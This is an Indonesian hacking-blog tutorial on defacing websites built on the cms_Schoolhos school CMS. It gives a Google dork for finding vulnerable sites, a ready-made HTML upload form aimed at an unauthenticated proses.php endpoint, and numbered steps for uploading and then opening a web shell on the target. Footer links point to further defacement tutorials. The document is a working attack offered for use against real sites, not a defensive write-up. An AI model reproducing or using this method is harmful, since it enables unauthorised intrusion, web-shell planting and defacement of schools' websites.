CSRF cms_Schoolhos

CSRF cms_Schoolhos

Assalamualaikum Wr.Wb

Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface CSRF cms_Schoolhos

Sebelum itu kita harus mempersiapkan sesuatu

- Dork :
inurl:/?p=berita ( Kembangkan dorknya )
-CSRF :

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tatsumi Crew</title>
</head>
<body>
<form method="POST" action="site.com/elearningku/proses.php?pilih=guru&untukdi=upload" enctype="multipart/form-data" name="tambahmapel" id="tambahmapel">
<input type="file" name="fupload">
<input type="submit" class="tombol" value="Upload">
</form>
</body>
</html>

Note: Yang warna merah ganti menjadi site target kalian.

Langusung saja :

1. Dorking dulu di google ( Berdoa saja semoga dapat yang vuln )

2. Jika sudah masukkan exploitnya seperti ini
contoh
site.com/[PATCH]/elearningku/proses.php
Jika ada blank atau putih berarti vuln selanjutnya

3. Masukkan link beserta exploit tadi ke dalam CSRF

4. Dan save CSRF dengan format .html
contoh : CSRF.html

5. Buka CSRF tersebut menggunakan browser kalian

6. Upload shell kalian

7. Akses shell ?!
site.com/file/materi/namashell.php

Mungkin itulah sedikit penjelasan mengenai "CSRF cms_Schoolhos"
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini

Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb

Adewakun

CSRF cms_Schoolhos

Post a Comment

KCFinder File Upload In PhpJabbers

Deface Metode Add Buku Tamu dan JS Overvlay (JSO)

Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell (Tatsumi Crew)

Deface Metode Plupload Arbitrary File Upload

Deface Metode Bypass Admin dengan XSS